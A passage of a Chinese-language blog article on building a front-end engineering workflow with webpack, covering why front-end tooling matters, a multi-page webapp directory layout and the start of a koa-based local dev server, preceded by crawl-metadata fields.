"ccnet_original_length": 21479,
"ccnet_original_nlines": 662,
"rps_doc_curly_bracket": 0.00018622999778017402,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.01887856051325798,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.05832628905773163,
"rps_doc_frac_lines_end_with_ellipsis": 0.0060331798158586025,
"rps_doc_frac_no_alph_words": 0.6286277770996094,
"rps_doc_frac_unique_words": 0.6413857936859131,
"rps_doc_mean_word_length": 16.62265968322754,
"rps_doc_num_sentences": 155,
"rps_doc_symbol_to_word_ratio": 0.0039447699673473835,
"rps_doc_unigram_entropy": 6.193307876586914,
"rps_doc_word_count": 1068,
"rps_doc_frac_chars_dupe_10grams": 0.01396946981549263,
"rps_doc_frac_chars_dupe_5grams": 0.03143130987882614,
"rps_doc_frac_chars_dupe_6grams": 0.026812370866537094,
"rps_doc_frac_chars_dupe_7grams": 0.0188137199729681,
"rps_doc_frac_chars_dupe_8grams": 0.0188137199729681,
"rps_doc_frac_chars_dupe_9grams": 0.0188137199729681,
"rps_doc_frac_chars_top_2gram": 0.005069570150226355,
"rps_doc_frac_chars_top_3gram": 0.005069570150226355,
"rps_doc_frac_chars_top_4gram": 0.00315440003760159,
"rps_doc_books_importance": -1545.532958984375,
"rps_doc_books_importance_length_correction": -1545.532958984375,
"rps_doc_openwebtext_importance": -993.4091796875,
"rps_doc_openwebtext_importance_length_correction": -993.4091796875,
"rps_doc_wikipedia_importance": -569.7265625,
"rps_doc_wikipedia_importance_length_correction": -569.7265625
},
"fasttext": {
"dclm": 0.5645833015441895,
"english": 0.01897214911878109,
"fineweb_edu_approx": 1.60709547996521,
"eai_general_math": 0.0024439699482172728,
"eai_open_web_math": 0.001291039981879294,
"eai_web_code": 0.6485990285873413
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.82",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.028",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "5",
"label": "Evaluate"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "4",
"label": "Advanced Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-7,920,755,781,809,910,000
|
POCUS to Diagnosis Gastric Content
Gastric byte
Diagnostic Accuracy of Point-of-Care Gastric Ultrasound
Anesthesia and Analgesia April 2018 - Pubmed Link
Take Home Points
1. Gastric POCUS appears highly accurate in determining full stomach in healthy volunteers.
2. Unclear how well this translates into determining aspiration risk in other patients.
Background
Ultrasound the stomach?! Why? That is certainly a reasonable question to ask before moving forward. The reason is that sometimes, unlike Las Vegas, what happens in the stomach does not stay in there. It can, on occasion, be regurgitated onto your shoes, your face, or - of most concern to the patient, into the airway. Having a full stomach increases the chance that there is going to be aspiration during anesthesia. Therefore, it has been posited in the past that a gastric ultrasound could help indicate the risk for aspiration during airway control. Why can’t you just count on patient’s being NPO? Three reasons 1) Sometimes its an emergency 2) Sometimes stomachs are full despite fasting and 3) Sometimes patients lie. This has particular relevance to anesthesiologists, but also can apply to anyone who does procedural sedation or intubation procedures.
Question
Can point of care gastric ultrasound accurately identify or rule out a full stomach in healthy volunteers?
Population
Authors from Canada
Healthy volunteers recruited
Inclusion:
• 18-85 years old
• ASA physical status I-II (normal or mild systemic disease)
• Height > 145 cm
• Ability to understand study protocol
Exclusion:
• Pregnancy
• Gastric or lower esophageal surgery
• Known abnormalities in upper GI tract (hiatal hernias, gastric tumors)
• Diabetes
• Renal or hepatic impairment
• Neurologic disorders
Design
Prospective, randomized, single blinded study
Intervention
Study subjects fasted for at least 8 hours (no solids or liquids)
US performed to confirm empty stomach at baseline
Randomized into 2 groups
Group 1: remained fasted
Group 2: ingested either 250 mL apple juice or solid meal (muffin + coffee with cream)
3 minutes after ingestion, index gastric ultrasound performed
Content identified as one of 3 categories:
• Nothing
• Clear fluid
• Solid
After 24 hours, same people randomized a second time into one of the 2 groups
Process repeated
Who did the ultrasounds?
Staff anesthesiologist with >100 gastric examinations, blinded to group allocation
The Scan
Low frequency curvilinear transducer, abdominal settings
Curvi
Standardized protocol in supine and right lateral decubitus
Step 1: Transducer in epigastrium in sagittal plane. Transverse view of antrum identified between liver (anteriorly) and pancreas and aorta (posteriorly). Repeat in right lateral decubitus.
• Empty = antrum collapsed, no content seen
• Clear fluid = hypoechoic/anechoic homogenous content
• Solid = hyperechoic or mixed echogenicity
Step 2: If clear fluid visualized, patient placed in right lateral decubitus and a cross-sectional area of the gastric antrum was measured (at the level of the aorta) to estimate the volume.
• Volume = 27 + 14.6 x CSA - 1.28 x age (this was validated by endoscopically guided gastric suctioning)
• Fun idea: Try having a friend drink an unknown quantity of liquid. Measure the stomach to see how accurate this equation is
Key Point:
Considered positive for full stomach if A) Solid content or B) >1.5 mL/kg of clear fluid
Considered inconclusive if could not image gastric antrum in both uspine and RLD positions or if there was uncertainty.
GastricUltrasound.org - Everything you wanted to know and more
Ultrasound Podcast on Gastric ultrasound Part 1 and Part 2
Results
The Patients
Screened 42 but 2 of them found to have full stomach at baseline
N = 40 → 80 sessions
• 19 males
• Mean age 37
• Mean weight 69 kg
• Mean height 168 cm
• Mean BMI 24 kg/m2
Primary Outcomes
Accuracy of POCUS for diagnosis full stomach:
Sensitivity 100% (CI 0.925-1)
Specificity 97.5% (CI 0.95-1)
+LR 40
-LR 0
All patients who ingested solids were true positives (14.3% only had high volume of fluid, no solid matter identified)
All patients who ingested juice were true positives (94.7% of patients had high volume of fluid, a single patient was thought to have solid content)
There was only one incorrect exam - this was a false positive (fasting patient called as full stomach).
There were no inconclusive studies.
No adverse events.
Limitations
Healthy, really healthy volunteers - couldn’t even have diabetes or a hiatal hernia. Couldn’t even be short! May not represent your population. We don't know how well this would work in any sick population or a population with potentially impaired gastric motility.
The sonographic appearance may be different with different amounts of food. In this study, just a single muffin with coffee was examined. What if eating a steak doesn't show up as well?
Each individuals used more than once. Really this is still only 40 unique patients, just reproducing it a second time.
Discussion
Authors note some important aspects of gastric ultrasound. Air in the antrum can cause an artifact seen at anterior wall that could resemble solid material. Need to measure the antral area in the right lateral decubitus. Measuring of the antrum should be between peristaltic contractions and include the full thickness of the gastric wall.
So if we accept that ultrasound can accurately predict if the stomach is filled, the next question to ask yourself is if this will change anything. What do you do with the knowledge that the stomach is full? If pre-op, delay case? If emergent, place NG? Authors suggest only changing management if pre-test uncertainty.
Take Home Points
1. Gastric POCUS appears highly accurate in determining full stomach in healthy volunteers.
2. Unclear how well this translates into determining aspiration risk in other patients.
Our score
3 Probes
Cite this post as
Michael Prats, MD. POCUS to Diagnosis Gastric Content. Ultrasound G.E.L. Podcast Blog. Published on May 07, 2018. Accessed on March 31, 2020. Available at https://www.ultrasoundgel.org/46.
Published on 05/07/18 06:00 AM
comments (5)
By Anonymous on 05/07/18 05:29 PM
Great synopsis -many thanks. On reading around, one issue is that no-one quite agrees on what ml/kg number constitutes signficant contents.....1.5ml/kg is only one of the many cutoffs.
By Anonymous on 05/08/18 02:33 PM
Why was the one fasting patient called a false positive for a full stomach? Doesn’t this actually tell us that for whatever reason they had delayed gastric emptying?
By Mike Prats on 05/10/18 08:58 AM
Thanks for the comments. Regarding the first comment - I agree that there needs to be a consensus about the correct gastric volume that constitutes a significant risk of aspiration. It would be hard to perform this study because we would need to follow subjects with varying gastric volumes to see if there is difference in aspiration events. It is important to figure this out because there may be different accuracy of ultrasound depending on the volume you choose. However, the alternative, and what this group has done, is to just pick a volume and see how that works when you use it. To the second comment - another great point! The problem is that we don't know if the ultrasound was positive because there was significant content in the stomach or if there was some other reason that made it positive. This study was attempting to determine the accuracy of ultrasound as a diagnostic modality, therefore - we can't assume on the basis of our intuition, that if the ultrasound visualizes content, it represents a full stomach. The reason that this was called a false positive is because the patient had no content visualized at their baseline ultrasound (before the randomization to fasting or ingestion), but afterwards, had some content visualized.
By Anonymous on 05/14/18 12:34 AM
forget juice......needs to be redone with 1-fasting, 2-beer, 3-pizza and beer...sorry i couldn't resist AND was it really juice?? I imagine the healthy volunteers might have included residents..
By Mike Prats on 05/14/18 08:20 AM
Good point - probably could redo the study many times to assess for different patient populations and their choice combinations of stomach contents!
|
{
"url": "https://www.ultrasoundgel.org/posts/iJe02ux9TPyPc9K14gZvXg",
"source_domain": "www.ultrasoundgel.org",
"snapshot_id": "crawl=CC-MAIN-2020-16",
"warc_metadata": {
"Content-Length": "22935",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:H2LQ25BWWIN4GTTZSN7XG5QJTGYUT6N4",
"WARC-Concurrent-To": "<urn:uuid:e3058623-71ec-4c39-8ef9-097bc892a55f>",
"WARC-Date": "2020-03-31T15:37:36Z",
"WARC-IP-Address": "45.55.101.56",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:HRWU5WPFWNG4GY53DYACF5IUT53OTWDW",
"WARC-Record-ID": "<urn:uuid:de236d98-22b2-4deb-a8e4-a5d790bacba7>",
"WARC-Target-URI": "https://www.ultrasoundgel.org/posts/iJe02ux9TPyPc9K14gZvXg",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:2fe9d102-e8ea-402f-a7a8-08c03da364df>"
},
"warc_info": "isPartOf: CC-MAIN-2020-16\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March/April 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-91.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
35,
36,
49,
50,
106,
107,
157,
158,
159,
176,
177,
269,
270,
358,
359,
360,
371,
372,
1233,
1234,
1235,
1244,
1245,
1352,
1353,
1354,
1365,
1366,
1386,
1387,
1416,
1417,
1418,
1429,
1430,
1450,
1451,
1514,
1515,
1535,
1536,
1577,
1578,
1579,
1590,
1591,
1605,
1606,
1646,
1647,
1722,
1723,
1736,
1737,
1769,
1770,
1795,
1796,
1797,
1804,
1805,
1851,
1852,
1853,
1866,
1867,
1933,
1934,
1984,
1985,
1986,
2011,
2012,
2043,
2044,
2137,
2138,
2139,
2201,
2202,
2245,
2246,
2258,
2259,
2275,
2276,
2286,
2287,
2365,
2366,
2383,
2384,
2385,
2410,
2411,
2494,
2495,
2496,
2505,
2506,
2563,
2564,
2570,
2571,
2572,
2632,
2633,
2823,
2824,
2870,
2871,
2928,
2929,
2975,
2976,
3167,
3168,
3275,
3276,
3404,
3405,
3406,
3417,
3418,
3507,
3508,
3628,
3629,
3630,
3693,
3694,
3753,
3754,
3755,
3763,
3764,
3777,
3778,
3843,
3844,
3865,
3866,
3879,
3880,
3896,
3897,
3919,
3920,
3943,
3944,
3966,
3967,
3968,
3985,
3986,
4032,
4033,
4063,
4064,
4094,
4095,
4102,
4103,
4109,
4110,
4111,
4230,
4231,
4380,
4381,
4485,
4486,
4522,
4523,
4542,
4543,
4544,
4556,
4557,
4823,
4824,
5010,
5011,
5130,
5131,
5132,
5143,
5144,
5484,
5485,
5805,
5806,
5807,
5824,
5825,
5917,
5918,
6006,
6007,
6008,
6018,
6019,
6028,
6029,
6030,
6048,
6049,
6238,
6269,
6282,
6316,
6501,
6535,
6701,
6736,
7993,
8027,
8222,
8257
],
"line_end_idx": [
35,
36,
49,
50,
106,
107,
157,
158,
159,
176,
177,
269,
270,
358,
359,
360,
371,
372,
1233,
1234,
1235,
1244,
1245,
1352,
1353,
1354,
1365,
1366,
1386,
1387,
1416,
1417,
1418,
1429,
1430,
1450,
1451,
1514,
1515,
1535,
1536,
1577,
1578,
1579,
1590,
1591,
1605,
1606,
1646,
1647,
1722,
1723,
1736,
1737,
1769,
1770,
1795,
1796,
1797,
1804,
1805,
1851,
1852,
1853,
1866,
1867,
1933,
1934,
1984,
1985,
1986,
2011,
2012,
2043,
2044,
2137,
2138,
2139,
2201,
2202,
2245,
2246,
2258,
2259,
2275,
2276,
2286,
2287,
2365,
2366,
2383,
2384,
2385,
2410,
2411,
2494,
2495,
2496,
2505,
2506,
2563,
2564,
2570,
2571,
2572,
2632,
2633,
2823,
2824,
2870,
2871,
2928,
2929,
2975,
2976,
3167,
3168,
3275,
3276,
3404,
3405,
3406,
3417,
3418,
3507,
3508,
3628,
3629,
3630,
3693,
3694,
3753,
3754,
3755,
3763,
3764,
3777,
3778,
3843,
3844,
3865,
3866,
3879,
3880,
3896,
3897,
3919,
3920,
3943,
3944,
3966,
3967,
3968,
3985,
3986,
4032,
4033,
4063,
4064,
4094,
4095,
4102,
4103,
4109,
4110,
4111,
4230,
4231,
4380,
4381,
4485,
4486,
4522,
4523,
4542,
4543,
4544,
4556,
4557,
4823,
4824,
5010,
5011,
5130,
5131,
5132,
5143,
5144,
5484,
5485,
5805,
5806,
5807,
5824,
5825,
5917,
5918,
6006,
6007,
6008,
6018,
6019,
6028,
6029,
6030,
6048,
6049,
6238,
6269,
6282,
6316,
6501,
6535,
6701,
6736,
7993,
8027,
8222,
8257,
8405
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 8405,
"ccnet_original_nlines": 219,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3242909908294678,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.02157830074429512,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.22564734518527985,
"rps_doc_frac_unique_words": 0.4325971007347107,
"rps_doc_mean_word_length": 5.0601677894592285,
"rps_doc_num_sentences": 87,
"rps_doc_symbol_to_word_ratio": 0.0024660900235176086,
"rps_doc_unigram_entropy": 5.756723403930664,
"rps_doc_word_count": 1313,
"rps_doc_frac_chars_dupe_10grams": 0.04936784878373146,
"rps_doc_frac_chars_dupe_5grams": 0.0689343810081482,
"rps_doc_frac_chars_dupe_6grams": 0.04936784878373146,
"rps_doc_frac_chars_dupe_7grams": 0.04936784878373146,
"rps_doc_frac_chars_dupe_8grams": 0.04936784878373146,
"rps_doc_frac_chars_dupe_9grams": 0.04936784878373146,
"rps_doc_frac_chars_top_2gram": 0.01655629090964794,
"rps_doc_frac_chars_top_3gram": 0.007224559783935547,
"rps_doc_frac_chars_top_4gram": 0.009030699729919434,
"rps_doc_books_importance": -853.8013916015625,
"rps_doc_books_importance_length_correction": -853.8013916015625,
"rps_doc_openwebtext_importance": -468.00048828125,
"rps_doc_openwebtext_importance_length_correction": -468.00048828125,
"rps_doc_wikipedia_importance": -340.53546142578125,
"rps_doc_wikipedia_importance_length_correction": -340.53546142578125
},
"fasttext": {
"dclm": 0.027172740548849106,
"english": 0.9288926720619202,
"fineweb_edu_approx": 2.1056859493255615,
"eai_general_math": 0.13259655237197876,
"eai_open_web_math": 0.32651108503341675,
"eai_web_code": 0.003044900018721819
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "616.07552",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
},
"secondary": {
"code": "616.0755",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "5",
"label": "Evaluate"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "3",
"label": "Academic Writing"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-2,252,682,794,360,007,700
|
1. 22 May, 2001 1 commit
• Michael Natterer's avatar
libgimp/.cvsignore libgimp/Makefile.am libgimp/gimp.h removed · 1cd6fcc1
Michael Natterer authored
2001-05-22 Michael Natterer <[email protected]>
* libgimp/.cvsignore
* libgimp/Makefile.am
* libgimp/gimp.h
* libgimp/gimpfeatures.h.in: removed gimpfeatures.h
* libgimpbase/.cvsignore
* libgimpbase/Makefile.am
* libgimpbase/gimpbase.h
* libgimpbase/gimpbasetypes.h
* libgimpbase/gimpversion.h.in: and added it as gimpversion.h
* configure.in: changed accordingly.
* app/app_procs.c
* app/main.c
* app/gui/about-dialog.c
* app/gui/splash.c
* app/pdb/misc_cmds.c
* tools/pdbgen/pdb/misc.pdb: fixed includes.
* plug-ins/bmp/bmpread.c
* plug-ins/bmp/bmpwrite.c
* plug-ins/common/gif.c
* plug-ins/common/gifload.c
* plug-ins/common/jpeg.c
* plug-ins/common/newsprint.c
* plug-ins/common/ps.c
* plug-ins/common/tiff.c
* plug-ins/gdyntext/gdyntextcompat.h
* plug-ins/gimpressionist/gimpressionist.c
* plug-ins/perl/Gimp.xs
* plug-ins/perl/Gimp/Lib.xs
* plug-ins/pygimp/gimpmodule.c
* tools/gimp-remote.c: removed all #ifdef GIMP_HAVE_BLAH
conditionals as they are broken anyway since we changed all
plug-ins with perl scripts shortly before 1.2. Also, refering to
intermediate unstable releases is evil.
1cd6fcc1
2. 26 Aug, 2000 1 commit
3. 15 Jul, 1998 1 commit
4. 09 Jan, 1998 1 commit
5. 27 Nov, 1997 1 commit
|
{
"url": "https://gitlab.gnome.org/GNOME/gimp/-/commits/02eaae82e26fed9eb96060ec9ae8d78ea08d131d/libgimp/.cvsignore",
"source_domain": "gitlab.gnome.org",
"snapshot_id": "crawl=CC-MAIN-2020-24",
"warc_metadata": {
"Content-Length": "42938",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:FUTGJSXKFJALQ4MAMCLAXJ3TSGVEFNBL",
"WARC-Concurrent-To": "<urn:uuid:2789d4a3-e087-489d-891b-4d4e3791f7d5>",
"WARC-Date": "2020-05-28T02:32:15Z",
"WARC-IP-Address": "8.43.85.27",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:I4I2MWNAHWRYX2WKEGHENECICXLKOYSO",
"WARC-Record-ID": "<urn:uuid:43a4929c-2cf9-4a13-96e7-7e731ebebab0>",
"WARC-Target-URI": "https://gitlab.gnome.org/GNOME/gimp/-/commits/02eaae82e26fed9eb96060ec9ae8d78ea08d131d/libgimp/.cvsignore",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:77e4658d-58a4-4424-bc30-be901229b3af>"
},
"warc_info": "isPartOf: CC-MAIN-2020-24\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May/June 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-9.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
27,
59,
138,
170,
223,
230,
258,
287,
311,
370,
377,
409,
442,
474,
511,
580,
587,
631,
638,
663,
683,
715,
741,
770,
822,
829,
861,
894,
925,
960,
992,
1029,
1059,
1091,
1135,
1185,
1216,
1251,
1289,
1353,
1420,
1492,
1539,
1554,
1581,
1608,
1635
],
"line_end_idx": [
27,
59,
138,
170,
223,
230,
258,
287,
311,
370,
377,
409,
442,
474,
511,
580,
587,
631,
638,
663,
683,
715,
741,
770,
822,
829,
861,
894,
925,
960,
992,
1029,
1059,
1091,
1135,
1185,
1216,
1251,
1289,
1353,
1420,
1492,
1539,
1554,
1581,
1608,
1635,
1661
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1661,
"ccnet_original_nlines": 47,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.12727272510528564,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.002597399987280369,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.48571428656578064,
"rps_doc_frac_unique_words": 0.8135592937469482,
"rps_doc_mean_word_length": 8.822033882141113,
"rps_doc_num_sentences": 49,
"rps_doc_symbol_to_word_ratio": 0.002597399987280369,
"rps_doc_unigram_entropy": 4.4497857093811035,
"rps_doc_word_count": 118,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.033621519804000854,
"rps_doc_frac_chars_top_3gram": 0.0864553302526474,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -204.26123046875,
"rps_doc_books_importance_length_correction": -190.87185668945312,
"rps_doc_openwebtext_importance": -126.38785552978516,
"rps_doc_openwebtext_importance_length_correction": -126.38785552978516,
"rps_doc_wikipedia_importance": -123.43262481689453,
"rps_doc_wikipedia_importance_length_correction": -111.75984191894531
},
"fasttext": {
"dclm": 0.9999891519546509,
"english": 0.6273929476737976,
"fineweb_edu_approx": 0.7918415069580078,
"eai_general_math": 0.010531309992074966,
"eai_open_web_math": 0.2540414333343506,
"eai_web_code": 0.8236750364303589
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.452",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "4",
"label": "Code/Software"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "22",
"label": "Truncated"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-1,184,900,907,532,748,300
|
基于webpack搭建前端工程解决方案探索
本篇主要介绍webpack的基本原理以及基于webpack搭建纯静态页面型前端项目工程化解决方案的思路。
下篇(还没写完)探讨下对于Node.js作为后端的项目工程化、模块化、前后端共享代码、自动化部署的做法。
关于webpack的更多用法和前端工程的讨论,可以到github https://github.com/chemdemo/chemdemo.github.io/issues/10
关于前端工程
下面是百科关于“软件工程”的名词解释:
软件工程是一门研究用工程化方法构建和维护有效的、实用的和高质量的软件的学科。
其中,工程化是方法,是将软件研发的各个链路串接起来的工具。
对于软件“工程化”,个人以为至少应当有如下特点:
• 有IDE的支持,负责初始化工程、工程结构组织、debug、编译、打包等工作
• 有固定或者约定的工程结构,规定软件所依赖的不同类别的资源的存放路径甚至代码的写法等
• 软件依赖的资源可能来自软件开发者,也有可能是第三方,工程化需要集成对资源的获取、打包、发布、版本管理等能力
• 和其他系统的集成,如CI系统、运维系统、监控系统等
广泛意义上讲,前端也属于软件工程的范畴。
但前端没有Eclipse、Visual Studio等为特定语言量身打造的IDE。因为前端不需要编译,即改即生效,在开发和调试时足够方便,只需要打开个浏览器即可完成,所以前端一般不会扯到“工程”这个概念。
在很长一段时间里,前端很简单,比如下面简单的几行代码就能够成一个可运行前端应用:
<!DOCTYPE html>
<html>
<head>
<title>webapp</title>
<link rel="stylesheet" href="app.css">
</head>
<body>
<h1>app title</h1>
<script src="app.js"></script>
</body>
</html>
但随着webapp的复杂程度不断在增加,前端也在变得很庞大和复杂,按照传统的开发方式会让前端失控:代码庞大难以维护、性能优化难做、开发成本变高。
感谢Node.js,使得JavaScript这门前端的主力语言突破了浏览器环境的限制可以独立运行在OS之上,这让JavaScript拥有了文件IO、网络IO的能力,前端可以根据需要任意定制研发辅助工具。
一时间出现了以Grunt、Gulp为代表的一批前端构建工具,“前端工程”这个概念逐渐被强调和重视。但是由于前端的复杂性和特殊性,前端工程化一直很难做,构建工具有太多局限性。
诚如 张云龙@fouber 所言:
前端是一种特殊的GUI软件,它有两个特殊性:一是前端由三种编程语言组成,二是前端代码在用户端运行时增量安装。
html、css和js的配合才能保证webapp的运行,增量安装是按需加载的需要。开发完成后输出三种以上不同格式的静态资源,静态资源之间有可能存在互相依赖关系,最终构成一个复杂的资源依赖树(甚至网)。
所以,前端工程,最起码需要解决以下问题:
• 提供开发所需的一整套运行环境,这和IDE作用类似
• 资源管理,包括资源获取、依赖处理、实时更新、按需加载、公共模块管理等
• 打通研发链路的各个环节,debug、mock、proxy、test、build、deploy等
其中,资源管理是前端最需要也是最难做的一个环节。
注:个人以为,与前端工程化对应的另一个重要的领域是前端组件化,前者属于工具,解决研发效率问题,后者属于前端生态,解决代码复用的问题,本篇对于后者不做深入。
在此以开发一个多页面型webapp为例,给出上面所提出的问题的解决方案。
前端开发环境搭建
主要目录结构
- webapp/ # webapp根目录
- src/ # 开发目录
+ css/ # css资源目录
+ img/ # webapp图片资源目录
- js/ # webapp js&jsx资源目录
- components/ # 标准组件存放目录
- foo/ # 组件foo
+ css/ # 组件foo的样式
+ js/ # 组件foo的逻辑
+ tmpl/ # 组件foo的模板
index.js # 组件foo的入口
+ bar/ # 组件bar
+ lib/ # 第三方纯js库
... # 根据项目需要任意添加的代码目录
+ tmpl/ # webapp前端模板资源目录
a.html # webapp入口文件a
b.html # webapp入口文件b
- assets/ # 编译输出目录,即发布目录
+ js/ # 编译输出的js目录
+ img/ # 编译输出的图片目录
+ css/ # 编译输出的css目录
a.html # 编译输出的入口a
b.html # 编译处理后的入口b
+ mock/ # 假数据目录
app.js # 本地server入口
routes.js # 本地路由配置
webpack.config.js # webpack配置文件
gulpfile.js # gulp任务配置
package.json # 项目配置
README.md # 项目说明
这是个经典的前端项目目录结构,项目目结构在一定程度上约定了开发规范。业务开发的同学只需关注src目录即可,开发时尽可能最小化模块粒度,这是异步加载的需要。assets是整个工程的产出,无需关注里边的内容是什么,至于怎么打包和解决资源依赖的,往下看。
本地开发环境
我们使用开源web框架搭建一个webserver,便于本地开发和调试,以及灵活地处理前端路由,以koa为例,主要代码如下:
// app.js
var http = require('http');
var koa = require('koa');
var serve = require('koa-static');
var app = koa();
var debug = process.env.NODE_ENV !== 'production';
// 开发环境和生产环境对应不同的目录
var viewDir = debug ? 'src' : 'assets';
// 处理静态资源和入口文件
app.use(serve(path.resolve(__dirname, viewDir), {
maxage: 0
}));
